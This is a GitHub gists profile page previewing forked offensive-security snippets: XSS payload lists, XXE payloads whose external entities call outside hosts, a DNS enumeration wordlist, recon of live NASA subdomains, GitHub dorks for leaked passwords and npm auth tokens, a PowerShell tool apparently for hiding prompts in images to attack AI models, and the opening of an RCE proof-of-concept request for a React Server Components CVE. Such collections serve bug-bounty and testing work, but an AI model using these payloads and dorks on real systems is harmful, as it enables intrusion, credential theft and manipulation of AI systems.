Skip to content

Instantly share code, notes, and snippets.

View marcostolosa's full-sized avatar
🏴‍☠️
Mem3nt0 Mori.

Marco 'Tr0p' Tolosa marcostolosa

🏴‍☠️
Mem3nt0 Mori.
48 followers · 38 following
View GitHub Profile
@marcostolosa
marcostolosa / google-dorks
Created December 20, 2025 00:17 — forked from clarketm/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@marcostolosa
marcostolosa / xss_vectors.txt
Created December 20, 2025 00:13 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@marcostolosa
marcostolosa / all.txt
Created December 20, 2025 00:12 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@marcostolosa
marcostolosa / XXE_payloads
Created December 20, 2025 00:10 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@marcostolosa
marcostolosa / active_nasa_subdomains.txt
Created December 14, 2025 02:48 — forked from Sneezy123/active_nasa_subdomains.txt
Active NASA subdomains (found with subfinder and assetfinder | checked with httpx) 968 Total
https://a.bufkin@nasa.gov
https://4hbkgddi6e45fw.intsvc.cloud.earthdata.nasa.gov
https://5ympyo4tlwomzy.intsvc.cloud.earthdata.nasa.gov
https://7l71o7zch5iyuh.intsvc.cloud.earthdata.nasa.gov
https://access.sit.earthdata.nasa.gov
https://8ocqncki7qrxau.intsvc.cloud.uat.earthdata.nasa.gov
https://6tnz37ndl6kuah.intsvc.cloud.sit.earthdata.nasa.gov
https://access.earthdata.nasa.gov
https://acesmacmgmtdpex.nasa.gov
https://access.uat.earthdata.nasa.gov
@marcostolosa
marcostolosa / Github Dorks
Created December 13, 2025 13:49 — forked from jhaddix/Github Dorks
echo ""
echo "************ Github Dork Links (must be logged in) *******************"
echo ""
echo " password"
echo "https://github.com/search?q="hackertarget.site"+password&type=Code"
echo "https://github.com/search?q=""hackertarget""+password&type=Code"
echo ""
echo " npmrc _auth"
@marcostolosa
marcostolosa / xxe-payloads.txt
Created December 11, 2025 18:24 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@marcostolosa
marcostolosa / hackerone-initiate-programs.sh
Created December 11, 2025 18:23 — forked from honoki/hackerone-initiate-programs.sh
Create new BBRF programs from your private and public HackerOne programs.
#!/bin/bash
# Initiate new BBRF programs from your public and private HackerOne programs
h1name="<your-hackerone-username>"
apitoken="<your-hackerone-api-token>"
next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100'
while [ "$next" ]; do
@marcostolosa
marcostolosa / Invoke-AIPromptStego.ps1
Created December 11, 2025 08:51 — forked from kennystrawnmusic/Invoke-AIPromptStego.ps1
function Invoke-AIPromptStego {
param(
[string]$InFile,
[string]$OutFile,
[string]$OutFormat,
[string]$Prompt
)
Add-Type -AssemblyName System.Drawing
@marcostolosa
marcostolosa / CVE-2025-55182.http
Created December 5, 2025 22:27 — forked from maple3142/CVE-2025-55182.http
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"